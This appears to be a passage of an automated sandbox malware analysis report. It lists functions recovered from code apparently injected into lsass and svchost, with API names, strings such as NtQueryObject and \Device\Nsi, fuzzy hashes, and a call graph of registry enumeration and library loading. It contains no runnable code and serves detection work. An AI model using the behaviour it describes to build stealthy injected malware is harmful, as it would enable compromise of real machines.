                                                    Memory Dump Source
                                                    • Source File: 00000029.00000002.3061505937.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_41_2_213bdce0000_lsass.jbxd
                                                    Similarity
                                                    • API ID: FileWrite$ConsoleErrorLastOutput
                                                    • String ID:
                                                    • API String ID: 2718003287-0
                                                    • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                    • Instruction ID: d0ae188cb9208859d57580f57e68af91c772b1affd1422831023fc799dab810f
                                                    • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                    • Instruction Fuzzy Hash: BAD1E272718A808AEB11CFA5D4443DC7BB2F36579CF108216CE599BB9DEA35C70AC740
                                                    Function 00000213BDCE14A4 Relevance: 6.3, APIs: 5, Instructions: 37memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000029.00000002.3061505937.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_41_2_213bdce0000_lsass.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$Free
                                                    • String ID:
                                                    • API String ID: 3168794593-0
                                                    • Opcode ID: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                    • Instruction ID: 31cca27c97c10b50b0d1f4af92040512d4615bcca040e4e08102490f9d85dd7c
                                                    • Opcode Fuzzy Hash: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                    • Instruction Fuzzy Hash: 91015A32648B94C6EB04DF66E9081CA77B2F798F8DF048425EA4A47729EE39D255C740
                                                    Function 00000213BDCF2980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000029.00000002.3061505937.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_41_2_213bdce0000_lsass.jbxd
                                                    Similarity
                                                    • API ID: ConsoleErrorLastMode
                                                    • String ID:
                                                    • API String ID: 953036326-0
                                                    • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                    • Instruction ID: 0ed097bee9c2838b483cb9f14b03d6e6f10cfa9755ec3a11846def29111419fb
                                                    • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                    • Instruction Fuzzy Hash: AF91073270865089FF60DF6594483EDBBA2F764B8CF144109DE4A9B69CEB36C78AC700
                                                    Function 00000213BDCE7960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000029.00000002.3061505937.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_41_2_213bdce0000_lsass.jbxd
                                                    Similarity
                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                    • String ID:
                                                    • API String ID: 2933794660-0
                                                    • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                    • Instruction ID: f3e89c732882dc4be1fda66988cc4488258048f9f4970aa2de9805cb3fbce708
                                                    • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                    • Instruction Fuzzy Hash: 80111F32754B0589EF00CB60E8593E833A4F76975CF440D25DAAD86798EB79C3988380
                                                    Function 00000213BDCE253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000029.00000002.3061505937.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_41_2_213bdce0000_lsass.jbxd
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID: \\.\pipe\
                                                    • API String ID: 3081899298-91387939
                                                    • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                    • Instruction ID: 402ccc82d5c6591d2abd376835e1d3f6cc6d53c76c666844c3b5344b78894b12
                                                    • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                    • Instruction Fuzzy Hash: 1371C6B620879987EF24DF25D8483EAA796F3A978CF540036DD0943B89FE36D7458700
                                                    Function 00000213BDCB9E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000029.00000002.3061237265.00000213BDCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCB0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_41_2_213bdcb0000_lsass.jbxd
                                                    Similarity
                                                    • API ID: CallTranslator
                                                    • String ID: MOC$RCC
                                                    • API String ID: 3163161869-2084237596
                                                    • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                    • Instruction ID: bbb7cdb92cb596dcb0788d693a3b58d75f0e34908b0e226618241f28b02e5c54
                                                    • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                    • Instruction Fuzzy Hash: ED616A32608B888AEB20DF65D4443DD77A2F768B8CF144215EF8917B98EB79D255C700
                                                    Function 00000213BDCE2330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000029.00000002.3061505937.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_41_2_213bdce0000_lsass.jbxd
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID: \\.\pipe\
                                                    • API String ID: 3081899298-91387939
                                                    • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                    • Instruction ID: 188ea66b7bcfd0c47726733c40de34c55d45513101da1f913a5e3211a342359a
                                                    • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                    • Instruction Fuzzy Hash: A151D4B220C78983EE64DE29A55C3FAA753F3AA74CF440135DD5903B49EA3BE7058780
                                                    Function 00000213BDCF26F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000029.00000002.3061505937.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_41_2_213bdce0000_lsass.jbxd
                                                    Similarity
                                                    • API ID: ErrorFileLastWrite
                                                    • String ID: U
                                                    • API String ID: 442123175-4171548499
                                                    • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                    • Instruction ID: 7ca704e4079fb843e18e962332c75f2c7a1687e35e23e5be027c6cd1584b2488
                                                    • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                    • Instruction Fuzzy Hash: D841A572319A8082DB20CF25E4483D9B7A1F7A879CF504121EE8D8B798EB3DC645CB40
                                                    Function 00000213BDCE94A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000029.00000002.3061505937.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_41_2_213bdce0000_lsass.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFileHeaderRaise
                                                    • String ID: csm
                                                    • API String ID: 2573137834-1018135373
                                                    • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                    • Instruction ID: 450ba37ac19791e17a21ad49c035722d0e53f3451afd1a5ee852b307dddf2d54
                                                    • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                    • Instruction Fuzzy Hash: AC112B32219B8482EB61CB15E44439977E6F798B9CF584220EE8D07768EF3DC655CB00
                                                    Function 00000213BDCB7356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000029.00000002.3061237265.00000213BDCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCB0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_41_2_213bdcb0000_lsass.jbxd
                                                    Similarity
                                                    • API ID: __std_exception_copy
                                                    • String ID: ierarchy Descriptor'$riptor at (
                                                    • API String ID: 592178966-758928094
                                                    • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                    • Instruction ID: f4862c4d9b7376f1182d3b6f5f2b365ac3009e22aec70bc65f16aebbe18ce939
                                                    • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                    • Instruction Fuzzy Hash: 4EE08671654B4890DF01CF21E8442D833A5DB68B6CB8891229A5C06315FA38D7EBC300
                                                    Function 00000213BDCB73B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000029.00000002.3061237265.00000213BDCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCB0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_41_2_213bdcb0000_lsass.jbxd
                                                    Similarity
                                                    • API ID: __std_exception_copy
                                                    • String ID: Locator'$riptor at (
                                                    • API String ID: 592178966-4215709766
                                                    • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                    • Instruction ID: 27a04a9311f7d125a749bde97889680f3ba368b48a2d80739b1b772cb5aa5af3
                                                    • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                    • Instruction Fuzzy Hash: 6FE08C71A54B4880DF02CF21E8802D873A6EB68B6CF889122DA4C06311FA38D7EAC300
                                                    Function 00000213BDCE1BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000029.00000002.3061505937.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_41_2_213bdce0000_lsass.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$AllocFree
                                                    • String ID:
                                                    • API String ID: 756756679-0
                                                    • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                    • Instruction ID: 02eb1687d551be4925cf3a57e29467bdb8e87c8f6b08593b3f3d5ec8add5e525
                                                    • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                    • Instruction Fuzzy Hash: C9118275605B4882EE04DB66A4082A977A2FB99FCCF185024DE4D87765EF3AD652D300
                                                    Function 00000213BDCE1268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000029.00000002.3061505937.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_41_2_213bdce0000_lsass.jbxd
                                                    Similarity
                                                    • API ID: Heap$AllocProcess
                                                    • String ID:
                                                    • API String ID: 1617791916-0
                                                    • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                    • Instruction ID: ca62a568da37a1804808f6c472a8f8a8754ce746572dadf88ae12087715b600f
                                                    • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                    • Instruction Fuzzy Hash: CCE0393564160486EB04CB62D80838A36E2EB99B0AF04C02489090B355EF7E8699C750

                                                    Execution Graph

                                                    Execution Coverage:0.8%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:81
                                                    Total number of Limit Nodes:4
                                                    execution_graph 14925 158709d1abc 14931 158709d1628 GetProcessHeap 14925->14931 14927 158709d1ad2 Sleep SleepEx 14929 158709d1acb 14927->14929 14929->14927 14930 158709d1598 StrCmpIW StrCmpW 14929->14930 14976 158709d18b4 14929->14976 14930->14929 14932 158709d1648 __std_exception_copy 14931->14932 14993 158709d1268 GetProcessHeap 14932->14993 14934 158709d1650 14935 158709d1268 2 API calls 14934->14935 14936 158709d1661 14935->14936 14937 158709d1268 2 API calls 14936->14937 14938 158709d166a 14937->14938 14939 158709d1268 2 API calls 14938->14939 14940 158709d1673 14939->14940 14941 158709d168e RegOpenKeyExW 14940->14941 14942 158709d18a6 14941->14942 14943 158709d16c0 RegOpenKeyExW 14941->14943 14942->14929 14944 158709d16ff RegOpenKeyExW 14943->14944 14945 158709d16e9 14943->14945 14947 158709d1723 14944->14947 14948 158709d173a RegOpenKeyExW 14944->14948 14997 158709d12bc RegQueryInfoKeyW 14945->14997 15008 158709d104c RegQueryInfoKeyW 14947->15008 14951 158709d1775 RegOpenKeyExW 14948->14951 14952 158709d175e 14948->14952 14949 158709d16f5 RegCloseKey 14949->14944 14955 158709d17b0 RegOpenKeyExW 14951->14955 14956 158709d1799 14951->14956 14954 158709d12bc 11 API calls 14952->14954 14959 158709d176b RegCloseKey 14954->14959 14957 158709d17d4 14955->14957 14958 158709d17eb RegOpenKeyExW 14955->14958 14960 158709d12bc 11 API calls 14956->14960 14961 158709d12bc 11 API calls 14957->14961 14962 158709d1826 RegOpenKeyExW 14958->14962 14963 158709d180f 14958->14963 14959->14951 14964 158709d17a6 RegCloseKey 14960->14964 14965 158709d17e1 RegCloseKey 14961->14965 14967 158709d1861 RegOpenKeyExW 14962->14967 14968 158709d184a 14962->14968 14966 158709d104c 4 API calls 14963->14966 14964->14955 14965->14958 14969 158709d181c RegCloseKey 14966->14969 14971 158709d1885 14967->14971 14972 158709d189c RegCloseKey 14967->14972 14970 158709d104c 4 API calls 14968->14970 14969->14962 14973 158709d1857 RegCloseKey 14970->14973 14974 158709d104c 4 API calls 14971->14974 14972->14942 14973->14967 14975 158709d1892 RegCloseKey 14974->14975 14975->14972 15021 158709d14a4 14976->15021 15014 158709e6168 14993->15014 14996 158709d12ae __std_exception_copy 14996->14934 14998 158709d1327 GetProcessHeap 14997->14998 14999 158709d148a __free_lconv_num 14997->14999 15002 158709d133e __std_exception_copy __free_lconv_num 14998->15002 14999->14949 15000 158709d1476 GetProcessHeap 15000->14999 15001 158709d1352 RegEnumValueW 15001->15002 15002->15000 15002->15001 15004 158709d13d3 GetProcessHeap 15002->15004 15005 158709d141e lstrlenW GetProcessHeap 15002->15005 15006 158709d13f3 GetProcessHeap 15002->15006 15007 158709d1443 StrCpyW 15002->15007 15016 158709d152c 15002->15016 15004->15002 15005->15002 15006->15002 15007->15002 15009 158709d11b5 RegCloseKey 15008->15009 15010 158709d10bf __std_exception_copy __free_lconv_num 15008->15010 15009->14948 15010->15009 15011 158709d10cf RegEnumValueW 15010->15011 15012 158709d114e GetProcessHeap 15010->15012 15013 158709d116e GetProcessHeap 15010->15013 15011->15010 15012->15010 15013->15010 15015 158709d1283 GetProcessHeap 15014->15015 15015->14996 15017 158709d157c 15016->15017 15020 158709d1546 15016->15020 15017->15002 15018 158709d1565 StrCmpW 15018->15020 15019 158709d155d StrCmpIW 15019->15020 15020->15017 15020->15018 15020->15019 15022 158709d14e1 GetProcessHeap 15021->15022 15023 158709d14c1 GetProcessHeap 15021->15023 15027 158709e6180 15022->15027 15025 158709d14da __free_lconv_num 15023->15025 15025->15022 15025->15023 15028 158709d14f6 GetProcessHeap HeapFree 15027->15028 15029 158709a273c 15030 158709a276a 15029->15030 15031 158709a2858 LoadLibraryA 15030->15031 15032 158709a28d4 15030->15032 15031->15030

                                                    Executed Functions

                                                    Function 00000158709D104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002C.00000002.3046293502.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_44_2_158709d0000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                    • String ID: d
                                                    • API String ID: 3743429067-2564639436
                                                    • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                    • Instruction ID: 406b0553ad116c0cf0cb50d7a38d1fd5da460869398bb6113de0fb484408bd0d
                                                    • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                    • Instruction Fuzzy Hash: 99418237218F84D6E760CF21E84439E77A1F389B99F148129DB891B758DF38C586CB00
                                                    Function 00000158709D328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000002C.00000002.3046293502.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_44_2_158709d0000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                    • String ID:
                                                    • API String ID: 1683269324-0
                                                    • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                    • Instruction ID: d10138deb8bbbe3c9e36edbeaa6ef6b6b2d091da5ebc89b531e029dc850f4207
                                                    • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                    • Instruction Fuzzy Hash: 9211C43E658E08C2F7609B21FE053D97294B7CC387FB08124990A6D6E6EF78C0468E00
                                                    Function 00000158709D1ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 00000158709D1628: GetProcessHeap.KERNEL32 ref: 00000158709D1633
                                                      • Part of subcall function 00000158709D1628: HeapAlloc.KERNEL32 ref: 00000158709D1642
                                                      • Part of subcall function 00000158709D1628: RegOpenKeyExW.ADVAPI32 ref: 00000158709D16B2
                                                      • Part of subcall function 00000158709D1628: RegOpenKeyExW.ADVAPI32 ref: 00000158709D16DF
                                                      • Part of subcall function 00000158709D1628: RegCloseKey.ADVAPI32 ref: 00000158709D16F9
                                                      • Part of subcall function 00000158709D1628: RegOpenKeyExW.ADVAPI32 ref: 00000158709D1719
                                                      • Part of subcall function 00000158709D1628: RegCloseKey.ADVAPI32 ref: 00000158709D1734
                                                      • Part of subcall function 00000158709D1628: RegOpenKeyExW.ADVAPI32 ref: 00000158709D1754
                                                      • Part of subcall function 00000158709D1628: RegCloseKey.ADVAPI32 ref: 00000158709D176F
                                                      • Part of subcall function 00000158709D1628: RegOpenKeyExW.ADVAPI32 ref: 00000158709D178F
                                                      • Part of subcall function 00000158709D1628: RegCloseKey.ADVAPI32 ref: 00000158709D17AA
                                                      • Part of subcall function 00000158709D1628: RegOpenKeyExW.ADVAPI32 ref: 00000158709D17CA
                                                    • Sleep.KERNEL32 ref: 00000158709D1AD7
                                                    • SleepEx.KERNELBASE ref: 00000158709D1ADD
                                                      • Part of subcall function 00000158709D1628: RegCloseKey.ADVAPI32 ref: 00000158709D17E5
                                                      • Part of subcall function 00000158709D1628: RegOpenKeyExW.ADVAPI32 ref: 00000158709D1805
                                                      • Part of subcall function 00000158709D1628: RegCloseKey.ADVAPI32 ref: 00000158709D1820
                                                      • Part of subcall function 00000158709D1628: RegOpenKeyExW.ADVAPI32 ref: 00000158709D1840
                                                      • Part of subcall function 00000158709D1628: RegCloseKey.ADVAPI32 ref: 00000158709D185B
                                                      • Part of subcall function 00000158709D1628: RegOpenKeyExW.ADVAPI32 ref: 00000158709D187B
                                                      • Part of subcall function 00000158709D1628: RegCloseKey.ADVAPI32 ref: 00000158709D1896
                                                      • Part of subcall function 00000158709D1628: RegCloseKey.ADVAPI32 ref: 00000158709D18A0
                                                    Memory Dump Source
                                                    • Source File: 0000002C.00000002.3046293502.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_44_2_158709d0000_svchost.jbxd
                                                    Similarity
                                                    • API ID: CloseOpen$HeapSleep$AllocProcess
                                                    • String ID:
                                                    • API String ID: 1534210851-0
                                                    • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                    • Instruction ID: dd6c86af37df3cdfce808d9367ca0a589ea4c12304fe849a19c5307a2c397293
                                                    • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                    • Instruction Fuzzy Hash: C931B47B244D49E1EB509B36DE513F93394A7CCBD2F2454229E09AF79BEE18C4538A10
                                                    Function 00000158709D3844 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 15COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 73 158709d3844-158709d384f 74 158709d3851-158709d3864 StrCmpNIW 73->74 75 158709d3869-158709d3870 73->75 74->75 76 158709d3866 74->76 76->75
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002C.00000002.3046293502.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_44_2_158709d0000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: dialer
                                                    • API String ID: 0-3528709123
                                                    • Opcode ID: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                    • Instruction ID: 780bff3d9f94a45a4787809db9a9868108e6e80b955a58f819050ff7eb005af9
                                                    • Opcode Fuzzy Hash: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                    • Instruction Fuzzy Hash: 8ED05E79351A09C6FB149FA68CC47A03350AB8C7D6FA89020990019160DF188D9EAE10
                                                    Function 00000158709A273C Relevance: 1.7, APIs: 1, Instructions: 187libraryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000002C.00000002.3045643461.00000158709A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709A0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_44_2_158709a0000_svchost.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0
                                                    • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                    • Instruction ID: 917a96bc1d6c895ecea56c2d7ec6bba4e4c507b6cb4fc8ea2b9ce0172117c01a
                                                    • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                    • Instruction Fuzzy Hash: 9A61E3BAB09A90C7DB548F19D9007EA7392F7D8B95F248121DE593B784DE38D853EB00

                                                    Non-executed Functions

                                                    Function 00000158709D2B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 385 158709d2b2c-158709d2ba5 call 158709f2ce0 388 158709d2ee0-158709d2f03 385->388 389 158709d2bab-158709d2bb1 385->389 389->388 390 158709d2bb7-158709d2bba 389->390 390->388 391 158709d2bc0-158709d2bc3 390->391 391->388 392 158709d2bc9-158709d2bd9 GetModuleHandleA 391->392 393 158709d2bed 392->393 394 158709d2bdb-158709d2beb GetProcAddress 392->394 395 158709d2bf0-158709d2c0e 393->395 394->395 395->388 397 158709d2c14-158709d2c33 StrCmpNIW 395->397 397->388 398 158709d2c39-158709d2c3d 397->398 398->388 399 158709d2c43-158709d2c4d 398->399 399->388 400 158709d2c53-158709d2c5a 399->400 400->388 401 158709d2c60-158709d2c73 400->401 402 158709d2c75-158709d2c81 401->402 403 158709d2c83 401->403 404 158709d2c86-158709d2c8a 402->404 403->404 405 158709d2c8c-158709d2c98 404->405 406 158709d2c9a 404->406 407 158709d2c9d-158709d2ca7 405->407 406->407 408 158709d2d9d-158709d2da1 407->408 409 158709d2cad-158709d2cb0 407->409 410 158709d2da7-158709d2daa 408->410 411 158709d2ed2-158709d2eda 408->411 412 158709d2cc2-158709d2ccc 409->412 413 158709d2cb2-158709d2cbf call 158709d199c 409->413 414 158709d2dac-158709d2db8 call 158709d199c 410->414 415 158709d2dbb-158709d2dc5 410->415 411->388 411->401 417 158709d2d00-158709d2d0a 412->417 418 158709d2cce-158709d2cdb 412->418 413->412 414->415 420 158709d2df5-158709d2df8 415->420 421 158709d2dc7-158709d2dd4 415->421 424 158709d2d0c-158709d2d19 417->424 425 158709d2d3a-158709d2d3d 417->425 418->417 423 158709d2cdd-158709d2cea 418->423 430 158709d2e05-158709d2e12 lstrlenW 420->430 431 158709d2dfa-158709d2e03 call 158709d1bbc 420->431 421->420 429 158709d2dd6-158709d2de3 421->429 432 158709d2ced-158709d2cf3 423->432 424->425 433 158709d2d1b-158709d2d28 424->433 427 158709d2d3f-158709d2d49 call 158709d1bbc 425->427 428 158709d2d4b-158709d2d58 lstrlenW 425->428 427->428 440 158709d2d93-158709d2d98 427->440 436 158709d2d7b-158709d2d8d call 158709d3844 428->436 437 158709d2d5a-158709d2d64 428->437 438 158709d2de6-158709d2dec 429->438 442 158709d2e35-158709d2e3f call 158709d3844 430->442 443 158709d2e14-158709d2e1e 430->443 431->430 449 158709d2e4a-158709d2e55 431->449 432->440 441 158709d2cf9-158709d2cfe 432->441 434 158709d2d2b-158709d2d31 433->434 434->440 444 158709d2d33-158709d2d38 434->444 436->440 452 158709d2e42-158709d2e44 436->452 437->436 447 158709d2d66-158709d2d79 call 158709d152c 437->447 448 158709d2dee-158709d2df3 438->448 438->449 440->452 441->417 441->432 442->452 443->442 453 158709d2e20-158709d2e33 call 158709d152c 443->453 444->425 444->434 447->436 447->440 448->420 448->438 456 158709d2e57-158709d2e5b 449->456 457 158709d2ecc-158709d2ed0 449->457 452->411 452->449 453->442 453->449 461 158709d2e63-158709d2e7d call 158709d85c0 456->461 462 158709d2e5d-158709d2e61 456->462 457->411 464 158709d2e80-158709d2e83 461->464 462->461 462->464 467 158709d2e85-158709d2ea3 call 158709d85c0 464->467 468 158709d2ea6-158709d2ea9 464->468 467->468 468->457 469 158709d2eab-158709d2ec9 call 158709d85c0 468->469 469->457
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002C.00000002.3046293502.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_44_2_158709d0000_svchost.jbxd
                                                    Similarity
                                                    • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                    • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                    • API String ID: 2119608203-3850299575
                                                    • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                    • Instruction ID: e19b0cfe6a8045a754af9c3da777dccb95321baacbab1f044a34d1dd9148c669
                                                    • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                    • Instruction Fuzzy Hash: 4EB1B03A218E58C2EB648F25DC407E973A5FBD8B96F245016EE496B796DF34CC42CB40
                                                    Function 00000158709D7D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
